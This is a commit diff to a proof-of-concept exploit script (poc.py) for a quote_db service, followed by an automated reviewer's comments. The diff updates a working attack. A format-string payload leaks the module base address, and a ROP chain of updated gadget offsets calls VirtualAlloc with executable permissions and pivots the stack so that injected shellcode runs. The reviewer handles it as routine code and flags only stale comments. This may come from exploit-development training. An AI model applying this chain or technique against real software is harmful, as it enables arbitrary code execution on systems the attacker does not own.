Projects STRLCPY quote_db Commits 9de9bd00
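--- a/poc.py
+++ b/poc.py
@@ -49,7 +49,7 @@
 print("[+] Getting base address...")
 
 quote_id = unpack("<I", add_quote(b"%x " * 30))[0]
-base_str = get_quote(quote_id).split(b" ")[8].decode()
+base_str = get_quote(quote_id).split(b" ")[2].decode()
 base = (int(base_str, 16) // 0x10000) * 0x10000
 
 print(" -- " + hex(base))
@@ -95,54 +95,54 @@
 
 rop = [
 # 1. Get ESP (in eax)
- base + 0x2610, # xor eax, eax ; ret
- base + 0x1eb1, # or eax, esp ; ret
+ base + 0x25c0, # xor eax, eax ; ret
+ base + 0x1e69, # or eax, esp ; ret
 
 # 2. Get dummy call addr (in ebx)
- base + 0x2b88, # pop ecx ; ret
+ base + 0x2b38, # pop ecx ; ret
  0x1ec, # eax + ? = dummy call
- base + 0x9b86, # add eax, ecx ; pop ebx ; ret
+ base + 0x9b36, # add eax, ecx ; pop ebx ; ret
  0xffffffff, # junk for pop ebx
- base + 0x1ebb, # mov ebx, eax ; ret
+ base + 0x1e73, # mov ebx, eax ; ret
 
 # 3. Deref virtualAlloc (in eax)
- base + 0x2b87, # pop eax ; pop ecx ; ret
- base + 0x4321c, # base + iat + virtualalloc
+ base + 0x2b37, # pop eax ; pop ecx ; ret
+ base + 0x43218, # base + iat + virtualalloc
  0xffffffff, # junk for pop ecx
- base + 0x1eb4, # mov eax, [eax] ; add ecx, 0x5 ; pop edx ; ret
+ base + 0x1e6c, # mov eax, [eax] ; add ecx, 0x5 ; pop edx ; ret
  0xffffffff, # junk for pop edx
 
 # 4. Write virtual alloc to dummy
- base + 0x1ec2, # mov [ebx], eax ; ret
+ base + 0x1e7a, # mov [ebx], eax ; ret
 
 # 5. Get shellcode addr (in eax)
- base + 0x1ec5, # xchg edx, ebx ; cmp ebx, eax ; ret
- base + 0x2d3c, # mov eax, edx ; ret
- base + 0x2b88, # pop ecx ; ret
+ base + 0x1e7d, # xchg edx, ebx ; cmp ebx, eax ; ret
+ base + 0x2cec, # mov eax, edx ; ret
+ base + 0x2b38, # pop ecx ; ret
  0x18, # eax + ? = dummy call
- base + 0x9b86, # add eax, ecx ; pop ebx ; ret
+ base + 0x9b36, # add eax, ecx ; pop ebx ; ret
  0xffffffff, # junk for pop ebx
- base + 0x1ec5, # xchg edx, ebx ; cmp ebx, eax ; ret
+ base + 0x1e7d, # xchg edx, ebx ; cmp ebx, eax ; ret
 
 # 6. Get dummy call addr + 0x4 (in ebx)
- base + 0x1eca, # add ebx, 0x4 ; ret
+ base + 0x1e82, # add ebx, 0x4 ; ret
 
 # 7. Write shellcode addr to dummy + 0x4
- base + 0x1ec2, # mov [ebx], eax ; ret
+ base + 0x1e7a, # mov [ebx], eax ; ret
 
 # 8. Get dummy call addr + 0x8 (in ebx)
- base + 0x1eca, # add ebx, 0x8 ; ret
+ base + 0x1e82, # add ebx, 0x4 ; ret
 
 # 9. Write shellcode addr to dummy + 0x8
- base + 0x1ec2, # mov [ebx], eax ; ret
+ base + 0x1e7a, # mov [ebx], eax ; ret
 
 # 10. Align esp with dummy call (ebx-8)
- base + 0x1ec5, # xchg edx, ebx ; cmp ebx, eax ; ret
- base + 0x2b88, # pop ecx ; ret
+ base + 0x1e7d, # xchg edx, ebx ; cmp ebx, eax ; ret
+ base + 0x2b38, # pop ecx ; ret
  0xfffffff8, # edx + ? = dummy call
- base + 0x1ece, # add edx, ecx ; ret
- base + 0x1ec5, # xchg edx, ebx ; cmp ebx, eax ; ret
- base + 0x1ebe, # xchg ebx, esp ; dec ecx ; ret
+ base + 0x1e86, # add edx, ecx ; ret
+ base + 0x1e7d, # xchg edx, ebx ; cmp ebx, eax ; ret
+ base + 0x1e76, # xchg ebx, esp ; dec ecx ; ret
 ]
 rop = b"".join([pack("<I", r) for r in rop])
 
@@ -151,7 +151,7 @@
 dummy = b"aaaa" # VirtualAlloc
 dummy += b"bbbb" # return <- shellcode addr
 dummy += b"cccc" # lpAddress <- shellcode addr
-dummy += pack("<I", 0x1) # dwSize <- 0x1
+dummy += pack("<I", 0x200) # dwSize <- 0x1
 dummy += pack("<I", 0x1000) # flAllocationType <- 0x1000
 dummy += pack("<I", 0x40) # flProtect <- 0x40
 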
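Review bot: The comment on new line 154 is stale: the packed value was changed to `0x200` but the trailing comment still reads `# dwSize <- 0x1`, so the line should become `dummy += pack("<I", 0x200) # dwSize <- 0x200`. On new line 52 the index moved from `[8]` to `[2]` with no explanation; a short comment stating which token of the leaked output that index selects would make the change reviewable, since the hunk gives no reason for the shift. The offset changes across lines 98–145 likewise carry no record of what they were re-derived against, and the commit has no description, so a one-line header comment documenting that would help anyone reading this later.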